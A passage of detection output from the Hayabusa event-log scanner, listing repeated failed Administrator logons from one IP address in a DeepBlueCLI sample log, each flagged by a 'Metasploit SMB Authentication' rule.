SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: 
